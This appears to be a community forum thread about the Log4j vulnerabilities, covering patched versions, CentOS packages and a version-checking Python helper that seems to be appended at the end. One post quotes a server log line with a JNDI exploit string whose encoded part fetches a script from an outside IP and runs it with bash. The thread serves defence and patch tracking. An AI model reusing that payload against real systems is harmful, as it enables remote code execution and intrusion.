Merry log4j2. Unfortunately


Close call?

1 Like

A little updated section.

log4j v1

Version 1 of log4j is vulnerable to other RCE attacks, and if you’re using it you need to migrate to 2.16.0.

I’d love to see CentOS upgrade the package to 2.16 without any reference (the changelog reports 2017 as the latest update), but I bet that this won’t happen.

https://logging.apache.org/log4j/2.x/manual/migration.html

A bridge seems to be available, but the code of the software using log4j would have to be partially updated anyway.

According to CheckPoint… Christmas and Hanukkah are gonna be wild.

Moreover, 2.15.0 increases security. Anyway…
Who knows if this apocalypse will teach something to software architects and lead developers. (Absolutely not)

1 Like

I can confirm that on my two modest servers, the Apache logs show quite a number of exploit attempts since 10/12 already:

access_log-20211212:45.155.205.233 - - [10/Dec/2021:14:20:44 +0100] "GET / HTTP/1.1" 403 6487 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMTYuMjAzLjc0LjEyMTo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8xMTYuMjAzLjc0LjEyMTo4MCl8YmFzaA==}"

Something today appeared on an installation…

rpm -qa log4j*
log4j-1.2.17-17.el7_4.noarch

Which seems to be a bugfix release of log4j (and not log4j2, the “overused” flawed package, which has been updated to 2.17 after hurried releases of .15 and .16)

Changelog reports

2021-12-15 - Mikolaj Izdebski mizdebsk@redhat.com - 0:1.2.17-17 - Fix remote code execution vulnerability - Resolves: CVE-2021-4104

and this is not the CVE that originated the apocalypse on the network, but another one.

So…
Is there a way to “shield” against attacks on Log4j2 via NethServer? IPS?

According to @rijkr over at savapage community

3 Likes

By extension… It was not vulnerable to CVE-2021-44228. This vulnerability was fixed, as stated by the Apache Foundation, in Log4j 2.17.0 (Java 8), 2.12.3 (Java 7) and 2.3.1 (Java 6).
But it was vulnerable to CVE-2021-4104 until the publication of 1.12.17

Merry coffee and latte.

1 Like

New day, new version.
Again? Again. :confounded:
So…
CVE-2021-44832 was disclosed to the Apache Foundation 2 days ago, and after a run of new patches, new versions became available yesterday: 2.17.1, 2.12.4, and 2.3.2.
Still talking about Log4j2.
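Since the fixed version now depends on which release line you are on (2.17.x for Java 8, 2.12.x for Java 7, 2.3.x for Java 6), a bare "is it above 2.16?" check no longer answers the question. The helper below is an added example, not code from this thread or from NethServer: it takes either a bare version or an RPM name of the form shown earlier (`rpm -qa log4j*`), picks the release line, and compares against the CVE-2021-44832 fixed versions listed in the post above. Log4j 1.x packages are reported separately as end-of-life, following the earlier advice in the thread to migrate rather than patch; the version floors are the ones stated on the page, nothing else is assumed.

```python
import re
from typing import Dict, Tuple

# Minimum fixed Log4j 2 versions for CVE-2021-44832, per release line, as listed in the thread.
FIXED_44832: Dict[str, Tuple[int, int, int]] = {
    "java8": (2, 17, 1),
    "java7": (2, 12, 4),
    "java6": (2, 3, 2),
}

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(s: str) -> Tuple[int, int, int]:
    """Extract major.minor.patch from a bare version ("2.16.0") or an RPM name
    such as "log4j-1.2.17-17.el7_4.noarch" (first dotted triple wins)."""
    m = VERSION_RE.search(s)
    if not m:
        raise ValueError(f"no version number found in {s!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def release_line(v: Tuple[int, int, int]) -> str:
    """Map a 2.x version to the release line that Apache maintains for it."""
    if v[:2] == (2, 3):
        return "java6"
    if v[:2] == (2, 12):
        return "java7"
    # Everything else on 2.x is expected to move to the current line.
    return "java8"


def assess(s: str) -> Tuple[str, str]:
    """Return (status, target) where status is 'eol', 'vulnerable' or 'fixed'
    with respect to CVE-2021-44832 and target is the version to be on."""
    v = parse_version(s)
    if v[0] < 2:
        # Log4j 1.x: no 2.x-style fix line; the thread's advice is to migrate.
        return ("eol", "2.x")
    floor = FIXED_44832[release_line(v)]
    target = ".".join(map(str, floor))
    return ("fixed" if v >= floor else "vulnerable", target)


def assess_rpm_list(text: str) -> Dict[str, Tuple[str, str]]:
    """Assess every non-empty line of `rpm -qa log4j*` style output."""
    return {line.strip(): assess(line) for line in text.splitlines() if line.strip()}


if __name__ == "__main__":
    # Constructed sample of `rpm -qa log4j*` output (the 1.x name mirrors the one quoted in the thread).
    sample = "log4j-1.2.17-17.el7_4.noarch\nlog4j2-2.16.0-1.noarch\n"
    for pkg, (status, target) in assess_rpm_list(sample).items():
        print(f"{pkg}: {status} (target {target})")
```

Tuple comparison does the version ordering, which is enough for plain major.minor.patch strings; it does not understand pre-release suffixes, so an `-rc1` style version would be parsed as its base triple.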